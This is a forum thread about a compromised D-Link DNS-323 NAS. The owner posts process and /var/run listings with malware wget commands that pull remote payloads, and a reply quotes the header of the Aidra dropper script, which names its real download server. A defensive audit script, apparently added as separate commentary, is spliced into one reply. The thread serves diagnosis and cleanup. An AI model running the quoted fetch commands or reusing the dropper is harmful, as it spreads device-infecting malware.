DSM-G600, DNS-3xx and NSA-220 Hack Forum

Unfortunately no one can be told what fun_plug is - you have to see it for yourself.


#1 2012-01-24 20:58:12

fboulange
Member
Registered: 2010-10-06
Posts: 29

DNS-323 Unwanted/Suspicious command?

Dear DNS-323 users.

I've been using my DNS for over 2 years now and lately it seemed to be running slow.
Therefore I rebooted it and looked at what was going on with a simple "ps" command.


I saw an unwanted/suspicious command:

Code:

1783 root     sh -c wget http://www.swlink.net/~styma/REMOTE_ADDR.shtml -T 3 -
1784 root     wget http://www.swlink.net/~styma/REMOTE_ADDR.shtml -T 3 -q -O /

Anyone got a similar thing or know what it is?
Cheers,

Fr3d


DNS-323 1.9 ~ miniDLNA Samsung patched ~Transmission 2.10


#2 2012-01-24 21:20:10

Mijzelf
Member / Developer
Registered: 2008-07-05
Posts: 709

Re: DNS-323 Unwanted/Suspicious command?

Running any DDNS scripts? According to this page the url should return your public IP address. But the server is down.

Last edited by Mijzelf (2012-01-24 21:20:47)


#3 2012-01-24 21:28:24

fboulange
Member
Registered: 2010-10-06
Posts: 29

Re: DNS-323 Unwanted/Suspicious command?

Mijzelf wrote:

Running any DDNS scripts? According to this page the url should return your public IP address. But the server is down.

None that I'm aware of...
Fr3d


DNS-323 1.9 ~ miniDLNA Samsung patched ~Transmission 2.10


#4 2012-02-06 22:47:41

fboulange
Member
Registered: 2010-10-06
Posts: 29

Re: DNS-323 Unwanted/Suspicious command?

Well, it's getting really annoying...
Here is the ps result lately:

Code:

27363 root     wget -c http://aban-co.ir/patrick/sh.sh.gz -P /var/run
13073 root     /ffp/bin/sh
30829 root     /ffp/bin/sh
30831 root     [sh]
15933 root     /ffp/bin/sh
21453 root     /ffp/bin/sh
21455 root     [sh]
21461 root     /var/run/armd
22591 root     /ffp/bin/sh
22592 root     /ffp/bin/sh
 6689 root     /ffp/bin/sh
24929 root     /var/run/armd
24930 root     /var/run/armd
15644 root     pure-ftpd (IDLE)
18362 root     /usr/sbin/samba/smbd -D
18366 root     /usr/sbin/samba/smbd -D
18367 root     /usr/sbin/samba/nmbd -D
19783 root     sshd: root@pts/45
22734 root     -sh
22865 root     /var/run/armd
22866 root     /var/run/armd
22867 root     /var/run/armd
22868 root     /var/run/armd
22869 root     /var/run/armd
22870 root     /var/run/armd
22871 root     /var/run/armd
22872 root     /var/run/armd
22873 root     /var/run/armd
22874 root     /var/run/armd
22875 root     /var/run/armd
22876 root     /var/run/armd
22877 root     /var/run/armd
22878 root     /var/run/armd
22879 root     /var/run/armd
22880 root     /var/run/armd
22881 root     /var/run/armd
22882 root     /var/run/armd
22883 root     /var/run/armd
22884 root     /var/run/armd
22885 root     /var/run/armd
22886 root     /var/run/armd
22887 root     /var/run/armd
22888 root     /var/run/armd
22889 root     /var/run/armd
22890 root     /var/run/armd
22891 root     /var/run/armd
22892 root     /var/run/armd
22893 root     /var/run/armd
22894 root     /var/run/armd
22895 root     /var/run/armd
22896 root     /var/run/armd
22897 root     /var/run/armd

and the /var/run contents:

Code:

root@Fred_NAS:/var/run# ls -la
drwxr-xr-x    3 root     root         1024 Feb  6 21:39 .
drwxr-xr-x    8 root     root         1024 Feb  5 22:04 ..
-rw-r--r--    1 root     root            5 Feb  6 18:16 .lightpid
-rw-r--r--    1 root     root         9361 Feb  6 21:46 .lightscan
-rw-r--r--    1 root     root            5 Feb  6 05:45 aidra.pid
-rwxr-xr-x    1 root     root       203430 Feb  6 05:45 arm
-rwxr-xr-x    1 root     root       202448 Feb  6 18:16 armd
-rw-r--r--    1 root     root        61952 Feb  6 16:33 armon.gz
-rw-r--r--    1 root     root            5 Feb  5 22:04 atd.pid
-rw-r--r--    1 root     root            5 Feb  5 22:04 lpd.515
srwxrwxrwx    1 root     root            0 Feb  5 22:04 lprng
-rw-r-----    1 root     root            5 Feb  5 22:04 minidlna.pid
-rwxr-xr-x    1 root     root       266075 Feb  6 05:45 mips
-rwxr-xr-x    1 root     root       266209 Feb  6 18:16 mipsd
-rwxr-xr-x    1 root     root       266136 Feb  6 05:45 mipsel
-rwxr-xr-x    1 root     root       266270 Feb  6 18:16 mipseld
-rwxr-xr-x    1 root     root       196445 Feb  6 05:45 ppc
-rwxr-xr-x    1 root     root       195047 Feb  6 18:16 ppcd
-rw-r--r--    1 root     root            5 Feb  5 22:04 pure-ftpd.pid
drwxr-xr-x    2 root     root         1024 Feb  6 21:45 samba
-rwxr-xr-x    1 root     root       180846 Feb  6 05:45 sh
-rw-r--r--    1 root     root          336 Feb  6 21:39 sh.sh.gz.gz
-rwxr-xr-x    1 root     root       179800 Feb  6 18:16 shd
-rw-r--r--    1 root     root            5 Feb  5 22:04 sshd.pid
-rw-r--r--    1 root     root          384 Feb  6 21:44 utmp
srwxrwxrwx    1 root     root            0 Feb  5 22:04 xmldb_sock
-rw-r--r--    1 root     root            4 Feb  5 22:04 xmldb_sock_config.pid

Any ideas?
Can you tell me how to block outside access to my DNS-323 and limit it to MAC addresses I will provide?
Cheers.
Fred


DNS-323 1.9 ~ miniDLNA Samsung patched ~Transmission 2.10


#5 2012-02-07 00:09:56

KRH
Member
From: Denmark
Registered: 2006-10-27
Posts: 219

Re: DNS-323 Unwanted/Suspicious command?

Your box has been hacked. You need to remove all fun_plug files and change the password.


First user to fun_plug the dns-323.


#6 2012-02-07 01:29:19

fboulange
Member
Registered: 2010-10-06
Posts: 29

Re: DNS-323 Unwanted/Suspicious command?

Right... that's what I thought...

Any tips on how to remove fun_plug files?
I've already changed my root password several times... Is there a proper way to do it?
I killed all suspicious processes for now, but I think they'll come back if I do not remove them all properly.
And then how to protect it once everything is cleaned?
Cheers
Fr3d

Last edited by fboulange (2012-02-07 01:37:09)


DNS-323 1.9 ~ miniDLNA Samsung patched ~Transmission 2.10


#7 2012-02-07 15:22:07

Mijzelf
Member / Developer
Registered: 2008-07-05
Posts: 709

Re: DNS-323 Unwanted/Suspicious command?

Any tips on how to remove fun_plug files?

Reverse the installation: delete the fun_plug script, reboot the box, and remove/rename the ffp tree.

I've already changed my root password several times...

As long as the malware has daemons running with root credentials, and/or is autostarted, it doesn't matter what the root password is.
BTW, I downloaded that 'http://aban-co.ir/patrick/sh.sh.gz' script, and it *suggests* that it's installed via a vulnerability in a web interface.

Code:

#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.

# YOUR HTTPD SERVER
REFERENCE_HTTP="http://80.82.222.66"

# NAME OF BINARIES (UPLOADED IN YOUR HTTPD)
REFERENCE_MIPSEL="mipselon.gz"
REFERENCE_MIPS="mipson.gz"
REFERENCE_SUPERH="shon.gz"
REFERENCE_ARM="armon.gz"
REFERENCE_PPC="ppcon.gz"

Smells like a scriptkiddie.
Are you running badly written PHP?

And then how to protect it once everything is cleaned?

Use strong passwords, do not open more ports than necessary, and review your webserver content.
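The symptoms this thread shows are quite specific: a wget pulling a remote script, binaries executing out of /var/run, and executables and .gz archives dropped into a directory that should only hold pid files and sockets. As an added illustration (not from the thread, not part of fun_plug or any of the tools mentioned), here is a small audit script that flags exactly those three patterns. The two sample listings inside it are constructed to resemble the posted ps and ls output, with example.invalid standing in for the real hosts, and it assumes busybox-style ps columns (PID USER COMMAND), as in the thread.

```shell
#!/bin/sh
# Added example, not code from the thread or from fun_plug: audit a ps listing
# and a /var/run listing for the drop pattern discussed above. On a live box:
#     ps | audit_ps          and          ls -la /var/run | audit_var_run
# Assumes busybox-style ps output with columns PID USER COMMAND.

# Flag processes whose program lives in a volatile directory, or whose command
# line fetches something over HTTP. One SUSPECT line per finding on stdout;
# exit status 1 when anything was found, 0 when the listing looks clean.
audit_ps() {
    awk '
        NR == 1 && $1 == "PID" { next }    # skip the header line if present
        # the program name is column 3 in busybox ps output
        $3 ~ /^\/(var\/run|tmp|dev\/shm)\// {
            print "SUSPECT exec-from-volatile-dir pid=" $1 " cmd=" $3
            hits++
        }
        # wget/curl anywhere on the command line together with a URL
        /(^|[ \t])(wget|curl)[ \t]/ && /https?:\/\// {
            line = $0
            sub(/^[ \t]*[^ \t]+[ \t]+[^ \t]+[ \t]+/, "", line)   # drop PID and USER
            print "SUSPECT remote-fetch pid=" $1 " cmd=" line
            hits++
        }
        END { exit (hits > 0) }
    '
}

# /var/run should hold pid files, sockets and a few small state files; an
# executable or a .gz archive there is the drop pattern seen in the thread.
audit_var_run() {
    awk '
        $1 ~ /^-/ && $1 ~ /x/      { print "SUSPECT executable-in-var-run name=" $NF " size=" $5; hits++ }
        $1 ~ /^-/ && $NF ~ /\.gz$/ { print "SUSPECT archive-in-var-run name=" $NF " size=" $5; hits++ }
        END { exit (hits > 0) }
    '
}

# Constructed sample data, modelled on the posted listings with hosts replaced.
SAMPLE_PS='  PID USER       COMMAND
 1783 root     sh -c wget http://www.example.invalid/REMOTE_ADDR.shtml -T 3 -q -O /dev/null
27363 root     wget -c http://example.invalid/sh.sh.gz -P /var/run
21461 root     /var/run/armd
15644 root     pure-ftpd (IDLE)
18362 root     /usr/sbin/samba/smbd -D
19783 root     sshd: root@pts/45'

SAMPLE_LS='drwxr-xr-x    3 root     root         1024 Feb  6 21:39 .
-rw-r--r--    1 root     root            5 Feb  6 05:45 aidra.pid
-rwxr-xr-x    1 root     root       202448 Feb  6 18:16 armd
-rw-r--r--    1 root     root        61952 Feb  6 16:33 armon.gz
-rw-r--r--    1 root     root            5 Feb  5 22:04 sshd.pid
srwxrwxrwx    1 root     root            0 Feb  5 22:04 xmldb_sock'

# Number of findings for each sample.
count_ps_findings() { printf '%s\n' "$SAMPLE_PS" | audit_ps | wc -l | tr -d ' '; }
count_ls_findings() { printf '%s\n' "$SAMPLE_LS" | audit_var_run | wc -l | tr -d ' '; }

# Demo run over the constructed samples: 3 process findings, 2 file findings.
printf '%s\n' "$SAMPLE_PS" | audit_ps || echo "ps: $(count_ps_findings) finding(s)"
printf '%s\n' "$SAMPLE_LS" | audit_var_run || echo "/var/run: $(count_ls_findings) finding(s)"
```

A clean ps listing straight after a reboot proves little on its own, for the reason Mijzelf gives: if the dropper is autostarted from the ffp tree it simply comes back, so the /var/run check is the one worth repeating a few minutes after boot.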


#8 2012-02-07 23:42:30

fboulange
Member
Registered: 2010-10-06
Posts: 29

Re: DNS-323 Unwanted/Suspicious command?

Ok, I've cleaned my box (as far as I know...).
Thanks for your advice (I've uninstalled lighttpd).

Reinstalled ffp 0.7 btw.
Now I've got to find a way to compile my DLNA server: minidlna on ffp 0.7...
Cheers


DNS-323 1.9 ~ miniDLNA Samsung patched ~Transmission 2.10


#9 2012-02-10 15:45:32

splash
New member
Registered: 2012-02-10
Posts: 1

Re: DNS-323 Unwanted/Suspicious command?

You were infected with Aidra: http://ahacktivia.org/index.php?noticeid=10
